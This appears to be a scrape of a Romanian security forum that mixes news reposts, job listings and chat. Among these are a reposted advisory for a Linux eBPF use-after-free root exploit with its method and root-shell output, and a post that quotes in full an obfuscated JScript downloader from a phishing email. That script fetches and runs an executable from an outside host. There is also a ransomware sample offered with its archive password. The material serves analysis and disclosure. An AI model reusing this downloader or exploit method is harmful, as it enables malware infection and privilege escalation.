Nytro

The Romanian Teen Hacker Who Hunts Bugs to Resist the Dark Side IT’S 3 AM, and his eyes are almost closed. The pack of gummy bears on his desk is empty. So’s the Chinese takeout box. Romanian white hat hacker Alex Coltuneac has had three hours of sleep tonight. And last night. And the night before that. He’s busy trying to find a vulnerability in YouTube live chat, which he plans to report to the company and hopefully get some money in return. None of the bugs he has discovered in the past few days electrifies him, so he keeps digging. In the past four years, Coltuneac has gotten bug bounty payments from Google, Facebook, Microsoft, Adobe, Yahoo, eBay, and PayPal for flaws he reported. Such bounty programs are a chance for Eastern European hackers like him to pursue a legitimate career in cybersecurity. And he’s only 19 years old. In a country better known for cybercrime, the teenager is part of small but growing cohort of hackers who are deciding to play it nice. This is a departure for the hacking community of Romania, known for such hits as the hackers Hackerville and Guccifer, and fraudsters who steal money from American bank accounts, perpetrate eBay frauds, and land themselves on the FBI’s most wanted list. Coltuneac is a freshman at the Babes-Bolyai University in Cluj-Napoca, where he learns Computer Science taught in English. Raised by a family who emphasized honest values, he started using a computer when his was 6. First, he taught himself how to play games, but as he got older he began to see the computer’s potential as a tool to make money. He spent his early teenage years watching fellow Romanian hackers make astounding sums of money selling exploits on the black market. They were able to rake in thousands of US dollars with just a few clicks, far more than Coltuneac’s parents made in a month. He was a good kid, from a good family. He didn’t want to join them. But he did want to pay for college. The allure of that life was powerful. Which is why he was so grateful to find out about bug bounty programs when he was 15. They pay enough to keep his conscience clear and his bank account full. Bounties cover the cost his education and living expenses, so “there’s no excuse to break the law,” he said. Coltuneac won’t say how much he earns as a vulnerability hunter, yet gifted white hat hackers doing the same kind of job brag about making in a lucky month about $6,000. That’s how much an ordinary Romanian earns in a year. The average take home pay in the country was about $520 a month this March, one of the lowest in the European Union. On the white market, a flaw found and reported legitimately is priced at a few hundred dollars, enough for Coltuneac to pay his rent this month. Sensitive ones are often rewarded with several thousand dollars. In very few cases, the bounty exceeds $100,000. He’s constantly hoping to find one of those. And that sum is still far less than what he would get if he sold the same vulnerabilities on the gray or black markets. (Gray markets sell exploits to nations and corporations to use against their foe; black markets sell to the highest bidder, often criminals.) Zerodium, a gray hat vulnerability broker working with law enforcement and intelligence agencies, awards a hacker up to $500,000 for a high-risk bug with fully functional exploit. Patching Giants Coltuneac started hunting vulnerabilities when he was 15, after visiting a Romanian cybersecurity forum, in his free time after school. Like most Romanian hackers, the teen is self taught. Soon, he got his first few hundred dollars from Google, and used them to buy himself a brand new computer. His desktop was dead slow. “I got lucky. I found a sensitive file. I used brute force,” he said. The tech giant is among the companies he closely monitors for bug bounty programs. He has recently found an LFI vulnerability and several XSS flaws in Google FeedBurner. Last year alone, Google awarded over $2 million to security researchers globally, and since 2010, when it began its bug bounty program, it has paid a total of $6 million. For 2015, Google highlighted Romania as among the top countries bug bounties were paid out to. Coltuneac has also made it to Microsoft’s Bounty Hunters: The Honor Roll. This spring he found an XSS vuln in their OAuth interface. Microsoft is constantly improving its bounty program, and last year, the company included rewards for flaws found in Azure, ASP.NET, .NET Core runtime and the Edge browser. Articol complet: https://www.wired.com/2016/05/romanian-teen-hacker-hunts-bugs-resist-dark-side/

Job-uri disponibile la inceputul verii: SecureWorks jobs: http://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/search/4894363 Penetration Tester - SecureWorks - Bucharest: http://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/penetration-tester-87625 Technical Testing Tools Developer - Ruby on Rails & JavaScript - SecureWorks - Bucharest: http://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/technical-testing-tools-developer-ruby-javascript-88418 Vulnerability Specialist - SecureWorks - Bucharest: http://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/vulnerability-specialist-85444 Solutions Architect Consultant - SecureWorks - Bucharest: http://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/solutions-architect-consultant-secureworks-bucharest-89440 Linux System Administrator - SecureWorks: http://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/linux-system-administrator-secureworks-89426 Junior Linux Administrator - SecureWorks - Bucharest: http://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/junior-linux-administrator-secureworks-bucharest-89427 Information Security Specialist - Rotating Shifts - SecureWorks - Bucharest: http://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/information-security-senior-analyst-rotating-shifts-86359 Local IT Support - SecureWorks - Bucharest: http://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/deskside-technician-85137 Network Engineering Specialist - SecureWorks - Bucharest: http://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/network-engineering-specialist-85077 Network Engineer - Telecom - SecureWorks - Bucharest: http://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/network-engineer-telecom-85891 Information Security Risk Management Advisor - SecureWorks - Bucharest: http://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/information-security-risk-management-advisor-secureworks-bucharest-89300 SharePoint Designer - SecureWorks - Bucharest: http://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/sharepoint-designer-secureworks-bucharest-89716 Dell jobs: Technical Support Agent - English: http://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/technical-support-agent-english-86798 Critical Incident Consultant: http://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/critical-incident-consultant-88525 Windows System Administrator: http://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/windows-system-administrator-86347 Information Security Team Leader: http://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/information-security-team-leader-86413 Network Security Engineer - Firewall: http://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/network-security-engineer-firewall-87655 Senior IT Manager: http://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/senior-it-manager-86956 Vulnerability Consultant: http://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/vulnerability-consultant-88299 Daca aveti intrebari, astept un PM.

Linux Kernel 4.4.x (Ubuntu 16.04) - Use-After-Free Local Root Exploit In Linux >=4.4, when the CONFIG_BPF_SYSCALL config option is set and the kernel.unprivileged_bpf_disabled sysctl is not explicitly set to 1 at runtime, unprivileged code can use the bpf() syscall to load eBPF socket filter programs. These conditions are fulfilled in Ubuntu 16.04. When an eBPF program is loaded using bpf(BPF_PROG_LOAD, ...), the first function that touches the supplied eBPF instructions is replace_map_fd_with_map_ptr(), which looks for instructions that reference eBPF map file descriptors and looks up pointers for the corresponding map files. This is done as follows: /* look for pseudo eBPF instructions that access map FDs and * replace them with actual map pointers */ static int replace_map_fd_with_map_ptr(struct verifier_env *env) { struct bpf_insn *insn = env->prog->insnsi; int insn_cnt = env->prog->len; int i, j; for (i = 0; i < insn_cnt; i++, insn++) { [checks for bad instructions] if (insn[0].code == (BPF_LD | BPF_IMM | BPF_DW)) { struct bpf_map *map; struct fd f; [checks for bad instructions] f = fdget(insn->imm); map = __bpf_map_get(f); if (IS_ERR(map)) { verbose("fd %d is not pointing to valid bpf_map\n", insn->imm); fdput(f); return PTR_ERR(map); } [...] } } [...] } __bpf_map_get contains the following code: /* if error is returned, fd is released. * On success caller should complete fd access with matching fdput() */ struct bpf_map *__bpf_map_get(struct fd f) { if (!f.file) return ERR_PTR(-EBADF); if (f.file->f_op != &bpf_map_fops) { fdput(f); return ERR_PTR(-EINVAL); } return f.file->private_data; } The problem is that when the caller supplies a file descriptor number referring to a struct file that is not an eBPF map, both __bpf_map_get() and replace_map_fd_with_map_ptr() will call fdput() on the struct fd. If __fget_light() detected that the file descriptor table is shared with another task and therefore the FDPUT_FPUT flag is set in the struct fd, this will cause the reference count of the struct file to be over-decremented, allowing an attacker to create a use-after-free situation where a struct file is freed although there are still references to it. A simple proof of concept that causes oopses/crashes on a kernel compiled with memory debugging options is attached as crasher.tar. One way to exploit this issue is to create a writable file descriptor, start a write operation on it, wait for the kernel to verify the file's writability, then free the writable file and open a readonly file that is allocated in the same place before the kernel writes into the freed file, allowing an attacker to write data to a readonly file. By e.g. writing to /etc/crontab, root privileges can then be obtained. There are two problems with this approach: The attacker should ideally be able to determine whether a newly allocated struct file is located at the same address as the previously freed one. Linux provides a syscall that performs exactly this comparison for the caller: kcmp(getpid(), getpid(), KCMP_FILE, uaf_fd, new_fd). In order to make exploitation more reliable, the attacker should be able to pause code execution in the kernel between the writability check of the target file and the actual write operation. This can be done by abusing the writev() syscall and FUSE: The attacker mounts a FUSE filesystem that artificially delays read accesses, then mmap()s a file containing a struct iovec from that FUSE filesystem and passes the result of mmap() to writev(). (Another way to do this would be to use the userfaultfd() syscall.) writev() calls do_writev(), which looks up the struct file * corresponding to the file descriptor number and then calls vfs_writev(). vfs_writev() verifies that the target file is writable, then calls do_readv_writev(), which first copies the struct iovec from userspace using import_iovec(), then performs the rest of the write operation. Because import_iovec() performs a userspace memory access, it may have to wait for pages to be faulted in - and in this case, it has to wait for the attacker-owned FUSE filesystem to resolve the pagefault, allowing the attacker to suspend code execution in the kernel at that point arbitrarily. An exploit that puts all this together is in exploit.tar. Usage: user@host:~/ebpf_mapfd_doubleput$ ./compile.sh user@host:~/ebpf_mapfd_doubleput$ ./doubleput starting writev woohoo, got pointer reuse writev returned successfully. if this worked, you'll have a root shell in <=60 seconds. suid file detected, launching rootshell... we have root privs now... root@host:~/ebpf_mapfd_doubleput# id uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare),999(vboxsf),1000(user) This exploit was tested on a Ubuntu 16.04 Desktop system. Fix: https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=8358b02bf67d3a5d8a825070e1aa73f25fb2e4c7 Proof of Concept: https://bugs.chromium.org/p/project-zero/issues/attachment?aid=232552 Sursa: https://cxsecurity.com/issue/WLB-2016050014

Android-Security-Reference This is a reference guide for all things Android Security. I'm slowly moving my private notes over to this repo as It may help others Others may help me (by correcting / adding to the ref) Feel free to contribute! Tools Nav helper OctoTree TOC gen DocToc Sursa: https://github.com/doridori/Android-Security-Reference

Anti-Sandbox and Anti-Virtual Machine Tool (Turkish : https://github.com/AlicanAkyol/sems/blob/master/Readme_Turkish.md) ( Sha1 (sems.exe) : 06598E9948C2E256C871E66B5578D51A1886758F) Modern malwares are equipped with anti-analysis techniques in order to evade analysis. It is common for malwares to check for the presence of any virtualization environment, any malware analysis sandboxes or any analysis tools during runtime. sems is a tool which is created to help malware researchers by checking their environments for the signatures of any virtualization techniques, malware sandbox tools or well know malware analysis tools. sems is using the same techniques and looking for the same footprints that evasive malwares do in order to detect if it is running in a controlled environment. So it is useful for malware researchers to check if the analysis environment is inevasible. How it works? Virtual Machine Once the tool is run in a virtual machine(Virtualbox, Vmware, Qemu), it performs all the checks which are shown below and drops logs to the console about detected signatures until the "control" text is shown. In addition to that a separate .txt file with the finding name is created in the running directory for each detected signatures. Example; vboxBios.txt will be created for virtualbox bios signature. Malware Sandbox sems tool is sent to malware sandbox like any other malware samples and waited until the completion of analysis. Detected signatures can be seen in "File Operations" section of the sandbox report hence sems drops separate .txt files for each findings. Sursa: https://github.com/AlicanAkyol/sems

Link: https://conference.hitb.org/hitbsecconf2016ams/materials/ Name Last modified Size Description Parent Directory - CLOSING KEYNOTE - Sophia D Antoine - Hardware Side Channels in Virtualized Environments.pdf 2016-05-27 18:40 2.3M D1 COMMSEC - Elisabeth de Leeuw - Unformation in the Era of Hyper Connectivity.pdf 2016-05-26 18:03 2.5M D1 COMMSEC - Marc Newlin - Applying Regulatory Data to IoT RF Reverse Engineering.pdf 2016-05-26 15:59 5.7M D1 COMMSEC - Martin Knobloch - Don't Feed the Hippos.pdf 2016-05-26 16:00 18M D1 COMMSEC - Melanie Rieback - Pentesting ChatOps.pdf 2016-05-30 10:06 3.4M D1 COMMSEC - Nadav Markus and Gal De Leon - Exploiting GLIBC - Hacking Everything.pdf 2016-05-26 18:18 1.0M D1T1 - Jacob Torrey - Using the Observer Effect and Cyber Fengshui.pdf 2016-05-26 15:37 4.9M D1T1 - Lin Huang - Forcing a Targeted LTE Cellphone into an Eavesdropping Network.pdf 2016-05-26 18:00 1.7M D1T1 - Nick Biasini - Exploit Kits - Hunting the Hunters .pdf 2016-05-26 17:05 45M D1T1 - Radu Caragea - Peering into the Depths of TLS Traffic in Real Time.pdf 2016-05-26 15:09 1.1M D1T1 - Shengping Wang and Xu Liu - Escape From The Docker-KVM-QEMU Machine.pdf 2016-05-26 12:16 2.0M D1T1 - Tang Qing Hao - Virtualization System Vulnerability Discovery Framework.pdf 2016-05-26 11:50 1.0M D1T2 - Broderick Aquilino and Wayne Low - Kernel Exploit Hunting and Mitigation.pdf 2016-05-26 15:10 1.4M D1T2 - Chilik Tamir - Profiting from iOS Malware.pdf 2016-05-26 15:37 27M D1T2 - Michele Spagnuolo and Lukas Weichselbaum - CSP Oddities.pdf 2016-05-26 12:31 1.6M D1T2 - Seunghun Han - Create Your Own Bad USB Device.pdf 2016-05-26 17:00 3.5M D1T2 - Tim Xia - Adaptive Android Kernel Live Patching.pdf 2016-05-26 18:20 2.4M D1T2 - Yann Allain and Julien Moinard - Hardsploit Project.pdf 2016-05-26 11:50 8.5M D1T3 - Gustavo Grieco - Vulnerability Discovery Using Machine Learning.pdf 2016-05-27 07:18 1.1M D1T3 LABS - Anto Joseph - Droid-FF.pdf 2016-05-26 12:31 30M D1T3 LABS - Tony Trummer and Tushar Dalvi - Mobile Application Security for iOS and Android.zip 2016-05-26 18:29 4.9M D2 COMMSEC - Antonio Martins - Inspecage - Android Pacakge Inspector.zip 2016-05-30 18:30 19M D2 COMMSEC - Barry van Kampen - Hack in The Class.pdf 2016-05-30 18:28 520K D2 COMMSEC - Mattijs van Ommeren - A Series Of Unfortunate Events - Where Malware Meets Murphy.pdf 2016-05-27 12:24 71M D2 COMMSEC - Paul Marinescu - Facebook Presents Capture the Flag.pdf 2016-05-30 10:17 6.3M D2T1 - Anders Fogh - Cache Side Channel Attacks.pdf 2016-05-27 13:52 432K D2T1 - Felix Wilhelm - Attacking Next Generation Firewalls.pdf 2016-05-27 15:59 2.9M D2T1 - Jun Li - CANSsee - An Automobile Intrusion Detection System.pdf 2016-05-27 18:39 5.5M D2T1 - Yuwei Zheng and Haoqi Shan - Forging a Wireless Time Signal to Attack NTP Servers.pdf 2016-05-27 12:26 6.9M D2T1 Itzik Kotler and Amit Klein - The Perfect Exfiltration Technique.pdf 2016-05-27 15:07 2.6M D2T2 - Mikhail Egorov and Sergey Soldatov - New Methods for Exploiting ORM Injections in Java Applications.pdf 2016-05-27 12:46 1.7M D2T2 - Peter blasty Geissler - Breaking Naive ESSID WPA2 Key Generation Algorithms.pdf 2016-05-27 18:39 8.4M D2T2 - Richard Johnson - Go Speed Tracer - Guided Fuzzing.pdf 2016-05-27 12:39 4.4M D2T2 - Shangcong Luan - Xen Hypervisor VM Escape.pdf 2016-05-27 15:37 1.9M D2T2 - Wish Wu - Perf - From Profiling to Kernel Exploiting.pdf 2016-05-27 15:06 315K D2T3 LABS - Matteo Beccaro - Electronic Access Control Security.pdf 2016-05-27 16:11 13M KEYNOTE 1 - John Adams - Beyond FBI v Apple.pdf 2016-05-26 09:40 6.4M KEYNOTE 2 - Adam Laurie - The Future Has Arrived and it's Effin Hilarious.odp 2016-05-27 10:47 281M Whitepapers/ 2016-05-27 18:40 - Felicitari Radu Caragea @ Bitdefender - https://conference.hitb.org/hitbsecconf2016ams/materials/D1T1 - Radu Caragea - Peering into the Depths of TLS Traffic in Real Time.pdf

or Browser 6.0 is released Posted May 30th, 2016 by gk The Tor Browser Team is proud to announce the first stable release in the 6.0 series. This release is available from the Tor Browser Project page and also from our distribution directory. This release brings us up to date with Firefox 45-ESR, which should mean a better support for HTML5 video on Youtube, as well as a host of other improvements. Beginning with the 6.0 series code-signing for OS X systems is introduced. This should help our users who had trouble with getting Tor Browser to work on their Mac due to Gatekeeper interference. There were bundle layout changes necessary to adhere to code signing requirements but the transition to the new Tor Browser layout on disk should go smoothly. The release also features new privacy enhancements and disables features where we either did not have the time to write a proper fix or where we decided they are rather potentially harmful in a Tor Browser context. On the security side this release makes sure that SHA1 certificate support is disabledand our updater is not only relying on the signature alone but is checking the hash of the downloaded update file as well before applying it. Moreover, we provide a fix for a Windows installer related DLL hijacking vulnerability. A note on our search engine situation: Lately, we got a couple of comments on our blog and via email wondering why we are now using DuckDuckGo as the default search engine and not Disconnect anymore. Well, we still use Disconnect. But for a while now Disconnect has no access to Google search results anymore which we used in Tor Browser. Disconnect being more a meta search engine which allows users to choose between different search providers fell back to delivering Bing search results which were basically unacceptable quality-wise. While Disconnect is still trying to fix the situation we asked them to change the fallback to DuckDuckGo as their search results are strictly better than the ones Bing delivers. The full changelog since Tor Browser 5.5.5 is: Tor Browser 6.0 -- May 30 All Platforms Update Firefox to 45.1.1esr Update OpenSSL to 1.0.1t Update Torbutton to 1.9.5.4 Bug 18466: Make Torbutton compatible with Firefox ESR 45 Bug 18743: Pref to hide 'Sign in to Sync' button in hamburger menu Bug 18905: Hide unusable items from help menu Bug 16017: Allow users to more easily set a non-tor SSH proxy Bug 17599: Provide shortcuts for New Identity and New Circuit Translation updates Code clean-up Update Tor Launcher to 0.2.9.3 Bug 13252: Do not store data in the application bundle Bug 18947: Tor Browser is not starting on OS X if put into /Applications Bug 11773: Setup wizard UI flow improvements Translation updates Update HTTPS-Everywhere to 5.1.9 Update meek to 0.22 (tag 0.22-18371-3) Bug 18371: Symlinks are incompatible with Gatekeeper signing Bug 18904: Mac OS: meek-http-helper profile not updated Bug 15197 and child tickets: Rebase Tor Browser patches to ESR 45 Bug 18900: Fix broken updater on Linux Bug 19121: The update.xml hash should get checked during update Bug 18042: Disable SHA1 certificate support Bug 18821: Disable libmdns support for desktop and mobile Bug 18848: Disable additional welcome URL shown on first start Bug 14970: Exempt our extensions from signing requirement Bug 16328: Disable MediaDevices.enumerateDevices Bug 16673: Disable HTTP Alternative-Services Bug 17167: Disable Mozilla's tracking protection Bug 18603: Disable performance-based WebGL fingerprinting option Bug 18738: Disable Selfsupport and Unified Telemetry Bug 18799: Disable Network Tickler Bug 18800: Remove DNS lookup in lockfile code Bug 18801: Disable dom.push preferences Bug 18802: Remove the JS-based Flash VM (Shumway) Bug 18863: Disable MozTCPSocket explicitly Bug 15640: Place Canvas MediaStream behind site permission Bug 16326: Verify cache isolation for Request and Fetch APIs Bug 18741: Fix OCSP and favicon isolation for ESR 45 Bug 16998: Disable <link rel="preconnect"> for now Bug 18898: Exempt the meek extension from the signing requirement as well Bug 18899: Don't copy Torbutton, TorLauncher, etc. into meek profile Bug 18890: Test importScripts() for cache and network isolation Bug 18886: Hide pocket menu items when Pocket is disabled Bug 18703: Fix circuit isolation issues on Page Info dialog Bug 19115: Tor Browser should not fall back to Bing as its search engine Bug 18915+19065: Use our search plugins in localized builds Bug 19176: Zip our language packs deterministically Bug 18811: Fix first-party isolation for blobs URLs in Workers Bug 18950: Disable or audit Reader View Bug 18886: Remove Pocket Bug 18619: Tor Browser reports "InvalidStateError" in browser console Bug 18945: Disable monitoring the connected state of Tor Browser users Bug 18855: Don't show error after add-on directory clean-up Bug 18885: Disable the option of logging TLS/SSL key material Bug 18770: SVGs should not show up on Page Info dialog when disabled Bug 18958: Spoof screen.orientation values Bug 19047: Disable Heartbeat prompts Bug 18914: Use English-only label in <isindex/> tags Bug 18996: Investigate server logging in esr45-based Tor Browser Bug 17790: Add unit tests for keyboard fingerprinting defenses Bug 18995: Regression test to ensure CacheStorage is disabled Bug 18912: Add automated tests for updater cert pinning Bug 16728: Add test cases for favicon isolation Bug 18976: Remove some FTE bridges Windows Bug 13419: Support ICU in Windows builds Bug 16874: Fix broken https://sports.yahoo.com/dailyfantasy page Bug 18767: Context menu is broken on Windows in ESR 45 based Tor Browser OS X Bug 6540: Support OS X Gatekeeper Bug 13252: Tor Browser should not store data in the application bundle Bug 18951: HTTPS-E is missing after update Bug 18904: meek-http-helper profile not updated Bug 18928: Upgrade is not smooth (requires another restart) Build System All Platforms Bug 18127: Add LXC support for building with Debian guest VMs Bug 16224: Don't use BUILD_HOSTNAME anymore in Firefox builds Bug 18919: Remove unused keys and unused dependencies Windows Bug 17895: Use NSIS 2.51 for installer to avoid DLL hijacking Bug 18290: Bump mingw-w64 commit we use OS X Bug 18331: Update toolchain for Firefox 45 ESR Bug 18690: Switch to Debian Wheezy guest VMs Linux Bug 18699: Stripping fails due to obsolete Browser/components directory Bug 18698: Include libgconf2-dev for our Linux builds Bug 15578: Switch to Debian Wheezy guest VMs (10.04 LTS is EOL) gk's blog Sursa: https://blog.torproject.org/blog/tor-browser-60-released

Depinde de experienta. Sunt la fel ca in programare.

Pentest cu o mana pe mouse si una in pantaloni.

Salut, Am mai primit un email cu un JS intr-un ZIP. E stupid, incepe cu comentarii, are pe la mijloc codul si se termina cu comentarii. In fine, JS-ul e urmatorul: var WARRANTIES0 = false; var mousemove0 = ""; var code; var delts = "C" + "r"+"e"+"ateObject"; /*@cc_on /* QU5zoJYpASu6 */ @if (@_win32 || @_win64)/* QU5zoJYpASu6 */ // WARRANTIES0 /* QU5zoJYpASu6 */= true;/* QU5zoJYpASu6 */ mousemove0/* QU5zoJYpASu6 */ = /* QU5zoJYpASu6 */"MLH";/* QU5zoJYpASu6 */ code =/* QU5zoJYpASu6 */ "R" + "esponseB"/* QU5zoJYpASu6 */ + "ydo".split('').reverse().join(''); objref = /* QU5zoJYpASu6 */(/* QU5zoJYpASu6 */"noitisop").split(''/* QU5zoJYpASu6 */).reverse(/* QU5zoJYpASu6 */).join(''); directionally0/* QU5zoJYpASu6 */ =/* QU5zoJYpASu6 */ "eliFoTevaS".split(''/* QU5zoJYpASu6 */).reverse().join(''); B12F40 = "A"+"DODB"; mousemove1 = "s" + "end"; dishy = "ht"+"tp:"+"//s"+"cr"+"ubs"+".dr"+"es"+"sco"+"ol."+"co"+"/z"+"cv"+"3h"+"hs"; dishy0 /* QU5zoJYpASu6 */ = "G\x45"+"T"; /* QU5zoJYpASu6 */ @end/* QU5zoJYpASu6 */ @*//* QU5zoJYpASu6 */ if (!(WARRANTIES0)) { WScript.Echo("pizzzzda"); WScript.Quit(1); } var Summary/* QU5zoJYpASu6 */ = /* QU5zoJYpASu6 */this[/* QU5zoJYpASu6 */"WScript"/* QU5zoJYpASu6 */]/* QU5zoJYpASu6 */; var delts0 = function mousemove() {return Summary[delts](("Trafdscks", "WScript")+".Shell");}(), delay0 = 4 * 2 + 3; var Amount0 = 1 * (2 - 0); var countRemain = Amount0 - ((1 * 2) + 0) * 1; function directionally(Summary0){delts0[("Ifasd ", "Gef.H.", "R")+ "u" + ("fudfk", "n")](Summary0, countRemain, countRemain);}; function cir(){return delts;}; { var code0 = "M" + "SX"+"ML2."+"X"+mousemove0+"T"+"TP"; var delay = ""; delay = "o"+"pen"; function penetration(FFFFF00) {FFFFF00[directionally0](delts0["E"+"xpandEnvir"+"o"+"nmentStrings"]("%T"+"E"+"M"+"P%/") + "qSj87b4UV.ex" + "e", (-9815 + 9817) * 1); return 0;}; if (true){ penetration1 = code0; cos1 = Summary[delts](penetration1); var WARRANTIES = 3-2; do { for (;WARRANTIES;){ try { if (WARRANTIES == 1) { cos1[delay](dishy0 /* QU5zoJYpASu6 */, dishy, (true, false)); cos1[mousemove1](); cos0 = "S"+"l"+"eep"; WARRANTIES = 2; } Summary[cos0](120); if (cos1["r"+"eadystate"] < 2 * 2) continue; WARRANTIES = countRemain; function cos(B12F4) {var penetration0 = (123, B12F4); return penetration0;}; FFFFF0 = delts0["E"+"xpandEnvir"+"o"+"nmentStrings"]("%T"+"E"+"M"+"P%/") + "qSj87b4UV.ex" + "e"; countRemain0 = delts0["E"+"xpandEnvir"+"o"+"nmentStrings"]("%T"+"E"+"M"+"P%/") + "suc11.05.2016kit.bat"; objref0 = "start "+FFFFF0+"\r\nexit" penetration1 = directionally1 = Summary[cir()](B12F40+"."+"Str"+"e"+"a"+"m"); penetration1[delay](); penetration1["t"+"y"+"pe"] = 2; Amount /* QU5zoJYpASu6 */ = "w"+"r"+"i"+"t"+"e"; penetration1["Charset"] = "windows-1251"; penetration1[Amount+"Text"](objref0); directionally1[objref] = 1 * 0; penetration1[directionally0](countRemain0, 2 * 1); directionally1["c"+"l"+"o"+"s"+"e"](); penetration1 = directionally1 = Summary[cir()](B12F40+"."+"Str"+"e"+"a"+"m"); penetration1[delay](); penetration1["t"+"y"+"pe"] = 2; penetration1["Charset"] = "windows-1251"; penetration1[Amount+"Text"]("M"); directionally1[objref] = 0; penetration(penetration1); directionally1["c"+"l"+"o"+"s"+"e"](); penetration1 = directionally1 = Summary[cir()](B12F40+"."+"Str"+"e"+"a"+"m"); penetration1[delay](); penetration1["t"+"y"+"pe"] = 1 * 1; penetration1[Amount](cos1[code]); directionally1[objref] = 1; penetration(penetration1); directionally1["c"+"l"+"o"+"s"+"e"](); if (1 && WARRANTIES0) directionally(countRemain0); } catch(cir0){};}; }while (WARRANTIES); } } E "obfuscat" cu pula dishy = "ht"+"tp:"+"//s"+"cr"+"ubs"+".dr"+"es"+"sco"+"ol."+"co"+"/z"+"cv"+"3h"+"hs"; Ma intreb ce nationalitate o avea autorul: if (!(WARRANTIES0)) { WScript.Echo("pizzzzda"); WScript.Quit(1); } Haideti baietii, puteti mai mult!

Attention! This is ransomware/malware/virus! Do NOT download! Salut, Am primit azi un mail cu un fisier Word macro enabled (.docm). Nu am avut timp sa ma uit peste el, dar pare Locky Ransomware. L-am scanat pe virustotal: https://virustotal.com/en/file/316d5366c4720c8be340088836d200866cea471ce01375314b48c36fbf593c70/analysis/1463064016/ Se pot vedea acolo macro-urile obfuscate. Parola arhiva: infected_rst Pentru cei care nu stiu despre ce este vorba, dar fi mai ok sa NU il descarcati. MalwareSample.zip

Evitati offtopic. Este un open redirect la urma urmei. L-am raportat celor de la IPB, astept un raspuns.

Deci: Folositi Chrome cu Tor, nu acel Firefox de cacat.

Din cate stiam, majoritatea fondurilor pentru dezvoltarea Tor provin de la US Government.

Probabil v-aţi întrebat de multe ori de ce anumite fişiere video se termină în avi, mkv, mov sau mp4 şi care este diferenţa dintre ele. În acelaşi fel, probabil că sunteţi curioşi să aflaţi care este diferenţa dintre un codec şi un format sau un container şi în ce fel influenţează extensia unui fişier calitatea informaţiei din interiorul său. Link: http://www.digi24.ro/Stiri/Digi24/Sci-tech/Lumea+digitala/Formate+extensii+video+Diferenta+dintre+avi+mkv+mov+mp4 PS: Am mai vazut articole de genul acesta pe Digi, imi place de ei.

Asa cu "A" - este 65 sau 0x41 (caracterul cu codul ASCII 65). Asa NULL byte este 0 sau 0x00 (caracterul cu codul ASCII 0). http://www.asciitable.com/ La ce te referi mai exact?

Da, un frumos raport de pentest

VIDEO: DEBLOCAREA UNEI ÎNCUIETORI CU AGRAFE DE PĂR Petru Stratulat | 15/04/2016 Am vazut cu totii filme in care usile erau accesate cu usurinta folosind doar doua agrafe de par, dar cum e posibil asa ceva? Tutorialul de mai jos te invata sa faci ca cei din filme, desi noi nu incurajam asemenea actiuni. Enjoy! Via: http://soundofscience.info/video-deblocarea-unei-incuietori/

Curtea Europeană: postarea de link-uri către conţinut piratat găzduit pe alte website-uri publice este legală Aurelian Mihai - 8 apr 2016 După ce în anul 2014 Curtea Europeană de Justiţie a anunţat că nu consideră postarea de link-ujri către conţinut găzduit pe alte website-uri publice ca fiind o încălcare a drepturilor de autor, Avocatul General al Curţii Europene vine cu completări ce vor face deliciul amatorilor de conţinut piratat. Potrivit acestuia, postarea de link-uri către alte website-uri publice nu constituie o încălcare a legii chiar dacă respectivul conţinut este găzduit fără permisiunea expresă a posesorului drepturilor de autor. Punctul de vedere al Curţii Europene a fost deja pus în discuţie într-un tribunal olandez, la procesul dus între un blog local numit GeenStijl şi publicaţia Playboy, vizând acuzaţii pentru postarea unor link-uri directe către un serviciu de file-sharing unde erau găzduite albume foto piratate aparţinând Playboy. Chiar dacă solicitarea pentru îndepărtarea conţinutului protejat a fost respectată de proprietarii serviciului de file sharing, proprietarul blogului a postat imediat link-uri actualizate către aceleaşi albume foto, găzduite însă pe un alt website. Încercarea de a forţa pe cale legală îndepărtarea link-urilor către conţinutul piratat s-a lovit însă de poziţia Avocatului General al Curţii Europene: „Hyperlink-urile care duc, chiar şi direct, către opere protejate nu le fac disponibile publicului când acestea sunt deja liber accesibile pe un alt website, ci doar servesc la facilitarea descoperirii lor”. Trebuie spus că poziţia avocatului Melchior Wathelet nu are putere de lege, decizia finală pe această temă urmând să fie luată în cursul acestui an, opinia Avocatului General cântărind însă puternic în interpretarea legilor UE. Sursa: http://www.go4it.ro/internet/curtea-europeana-postarea-de-link-uri-catre-continut-piratat-gazduit-pe-alte-website-uri-publice-este-legala-15220754/

De ce e "much better than Beef"? Pare sa faca cam aceleasi lucruri, doar ca un Gigel o sa aiba si el acces la acele persoane.

Da, e ciudata miscarea asta a lor, poate vor ca userii sa aiba mai multa incredere in serviciile lor. Astept primul raport pe a analiza a acestei "end-to end encryption".

Ceva interesant pe acolo? Face cineva un rezumat?

EXPLOITING BUFFER OVERFLOWS ON MIPS ARCHITECTURES A Walkthrough by Lyon Yang @l0Op3r Editing and Support: Bernhard Mueller Table of Contents 1. Introduction............................................................................................................. 3 2. Triggering and Debugging the Exploit....................................................................... 3 3. Cache Incoherency ................................................................................................... 7 4. Overcoming ASLR..................................................................................................... 8 5. Using ROP Gadgets .................................................................................................. 9 6. Writing the exploit – Calculating Offsets ................................................................ 14 7. Writing the exploit – Writing the MIPS Shellcode Encoder ..................................... 17 8. Writing the exploit – fork() Shellcode..................................................................... 22 Download: https://www.exploit-db.com/docs/39658.pdf

